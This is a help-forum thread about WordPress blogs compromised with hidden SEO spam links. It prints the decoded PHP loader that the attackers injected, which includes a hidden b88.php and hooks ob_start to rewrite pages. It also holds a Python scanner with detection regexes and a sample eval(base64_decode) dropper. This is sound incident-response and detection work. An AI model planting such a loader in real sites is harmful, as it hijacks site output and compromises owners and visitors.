Hannahro11

asked on 

Several WordPress Blogs Hacked with Outbound Comment HTML Links

Hello,

We need someone to help us fix a WordPress hack job where all of the WordPress sites on our own server appear to have been hacked by the same breach. This hack is pretty insidious in that it installs hidden outbound links in the stylesheet. Once we hit "approve" on comments it bleeds the blog dry of all page rank (SEO terminology). We do not know how this hole occurred, and we want to fix it on our server. I have attached an example of the hack as it appears in the compromised area. This has occurred on all the blogs in this jail on our server.

The attached file, 'hacked text at bottom of posts.txt', is a sample of what's appended to the post when you view the source - not viewable on the webpage via a browser.
 
The second text (php-hack): I've manually replaced all of the PHP files in the blog and the theme. There had been a block of encrypted stuff at the top of many PHP scripts, the main PHP scripts for the theme and the main WP style sheet. Attached is a sample of that, too: php-hack.txt

Again, let us know if you can help.

Attachments: php-hack.txt, blog-hack-1.txt
Tags: Security, WordPress, Vulnerabilities

Jason C. Levine

Hi Hannahro11,

Typically what bad guys do is compromise the server via an FTP or shell account and then set up a script that seeks out WordPress (because it is so common) and alters the files there to redirect or display different content.

Is this your own server or is it hosted?
Hannahro11

ASKER

It is our own server.
Hannahro11

ASKER

You are right, this means that the shell may have been compromised without cPanel. Or each blog was compromised individually. Strange. What to do. (smile)
My expertise in this sort of thing ends with WordPress. I've seen these types of hacks before, which is why I commented.

You should probably hit Request Attention above and ask the Moderators to resend alerts.
I took a look at the encoded PHP file you sent and this is what the decoded version looks like.

    /*eoltijfbzgjhmixzqarebwipjfgniyhagohvmezlkpojkepldd*/
    // run once per request: $GLOBALS['mfsn'] doubles as an "already loaded" flag
    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
        // the real payload lives in a PHP file hidden inside an image folder
        $GLOBALS['mfsn']='/usr/local/www/blogs/getthetrafficnow/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/b88.php';
        if(file_exists($GLOBALS['mfsn'])){
            include_once($GLOBALS['mfsn']);
            // dgobh() becomes an output-buffer callback, so it can rewrite every page before it is sent
            if(function_exists('gml')&&function_exists('dgobh')){
                ob_start('dgobh');
            }
        }
    }

Do you still have a copy of that file b88.php? If so, can you attach it here? I believe that may be how they intended to gain access after the fact; I just want to confirm.
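As an added example (not code from this thread, from the attached files, or from WordPress), the following Python scan looks for the shape of the decoded loader above across a site tree, flags PHP files sitting in asset directories such as the tinymce image folder where b88.php was found, and lists files that were added or changed relative to a clean copy of the same release. The regex, the asset-directory list, the site name and the sample file contents are assumptions built for the demo from the one sample posted here.

```python
"""Scan a WordPress tree for the ob_start loader shown above and diff it
against a clean copy. Constructed demo data; not code from the thread."""
import hashlib
import os
import re
import tempfile

# Heuristic for the decoded header above: a long throwaway comment, a guard
# on a $GLOBALS slot, a .php path assigned to it, then ob_start('callback').
# Assumed from that one sample; other variants will need their own pattern.
LOADER_RE = re.compile(
    r"/\*[a-z0-9]{20,}\*/\s*if\s*\(\s*function_exists\s*\(\s*['\"]ob_start['\"]\s*\)"
    r".*?\$GLOBALS\s*\[\s*['\"][a-z0-9_]+['\"]\s*\]\s*=\s*['\"][^'\"]+\.php['\"]"
    r".*?ob_start\s*\(\s*['\"][A-Za-z0-9_]+['\"]\s*\)",
    re.S,
)
# Generic obfuscation calls worth a manual look even when LOADER_RE misses.
OBFUSCATION_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|create_function)\s*\("
)
# PHP files have no business under these asset directories (assumed list).
ASSET_DIR_MARKERS = ("/wp-includes/js/", "/wp-includes/images/", "/wp-content/uploads/")


def scan_tree(root):
    """Return (relative posix path, reason) findings for every .php under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(marker in "/" + rel for marker in ASSET_DIR_MARKERS):
                findings.append((rel, "php file in asset directory"))
            with open(full, encoding="utf-8", errors="replace") as fh:
                head = fh.read(4096)  # the injected block sits at the very top
            if LOADER_RE.search(head):
                findings.append((rel, "ob_start loader injected at top of file"))
            elif OBFUSCATION_RE.search(head):
                findings.append((rel, "obfuscation call near top of file"))
    return findings


def _hash_tree(root):
    """Map relative posix path -> sha256 for every file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            out[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return out


def diff_against_clean(site_root, clean_root):
    """Files in site_root that are added or changed relative to a clean copy."""
    site, clean = _hash_tree(site_root), _hash_tree(clean_root)
    added = sorted(p for p in site if p not in clean)
    modified = sorted(p for p in site if p in clean and site[p] != clean[p])
    return added, modified


# Constructed sample data (made up for this demo; not the attached files).
CLEAN_INDEX = "<?php\n/** Loads the WordPress environment and template. */\nrequire __DIR__ . '/wp-blog-header.php';\n"
INJECTED_HEADER = (
    "<?php /*eoltijfbzgjhmixzqarebwipjfgniyhagohvmezlkpojkepldd*/ "
    "if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){"
    "$GLOBALS['mfsn']='/var/www/example/wp-includes/js/tinymce/img/b88.php';"
    "if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);"
    "if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}\n"
)
DROPPER = "<?php eval(base64_decode('ZWNobyAxOw=='));\n"  # stand-in for b88.php


def build_demo(base):
    """Write a clean tree and an infected copy of it under base; return both roots."""
    clean, site = os.path.join(base, "clean"), os.path.join(base, "site")
    for root in (clean, site):
        os.makedirs(os.path.join(root, "wp-includes", "js", "tinymce", "img"))
        with open(os.path.join(root, "wp-includes", "version.php"), "w") as fh:
            fh.write("<?php\n// untouched core file (placeholder)\n")
    with open(os.path.join(clean, "index.php"), "w") as fh:
        fh.write(CLEAN_INDEX)
    with open(os.path.join(site, "index.php"), "w") as fh:
        fh.write(INJECTED_HEADER + CLEAN_INDEX[len("<?php\n"):])
    with open(os.path.join(site, "wp-includes", "js", "tinymce", "img", "b88.php"), "w") as fh:
        fh.write(DROPPER)
    return site, clean


def run_demo():
    """Scan the constructed infected tree; return findings plus the clean/site diff."""
    with tempfile.TemporaryDirectory() as base:
        site, clean = build_demo(base)
        added, modified = diff_against_clean(site, clean)
        return scan_tree(site), scan_tree(clean), added, modified


if __name__ == "__main__":
    findings, clean_findings, added, modified = run_demo()
    for rel, reason in findings:
        print(f"FLAG {rel}: {reason}")
    print("clean tree findings:", clean_findings)
    print("added:", added, "modified:", modified)
```

On a real server, point scan_tree() at the document root of each blog and diff_against_clean() at that tree plus a freshly extracted WordPress release of the same version with the theme and plugins unpacked from their original archives. Anything in the added or modified lists that you did not write yourself deserves a look (wp-config.php will legitimately show as modified). The loader regex only matches the shape of the sample posted here; a different obfuscator will need its own pattern, which is why the generic obfuscation check and the "PHP in an asset directory" check are kept separate.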
Hannahro11

ASKER

I am checking with the server admin and will get right back. Thank you very much for the right question, by the way.
What did they have to say?
Hannahro11

ASKER

Hi Russell, he is still looking at it. Sorry long night. (smile)
Are there more encrypted files? Also, what version of WordPress is being used? Any specific plugins being used?
Hannahro11

ASKER

Yes, I finally got the encrypted files. Attached.

a bit more background...
 
I had painstakingly removed the encoded stuff from all the php files, so I grabbed a header from a file on a different blog in my network.

the b88.php file exists on this other blog, not on the blog that I attached files for previously.
 
not sure what to make of that...
 
but here is the b88.php file
 
In the same folder there was a mysterious c120.php file and sure enough, when I look at it, it's encoded as well...
 
so both files are zipped up and attached.
 
I'll see if I can find one of the old infected files from the original blog (our most profitable site); I might have kept a copy somewhere. Also, we are new to Experts-Exchange and are sort of interested in who you are (Russell Venable), as we have issues come up all the time.
Attachments: encoded-header-1.txt, c120.txt, b88.txt
Welcome to EE! My Profile pretty much sums it up. I am not sure exactly what you want to know.  I will take a look at the files and see what I can come up with.
ASKER CERTIFIED SOLUTION
Russell_Venable

THIS SOLUTION IS ONLY AVAILABLE TO MEMBERS.

SOLUTION (members only)
Hannahro11

ASKER

Hello Russell,
Pretty blown away by this. I will take this to my administrators now and see what they both say. I will get back to you as soon as I have their response. Thanks a lot my friend. Be right back.  
Hannahro11

ASKER

Hi Russell.

I think we are uncomfortable talking about this here. Can you email me at <removed> so we can move forward with your line of reasoning?

Thank you.

My name is also Russell
SOLUTION (members only)
I plan on it :)
SOLUTION (members only)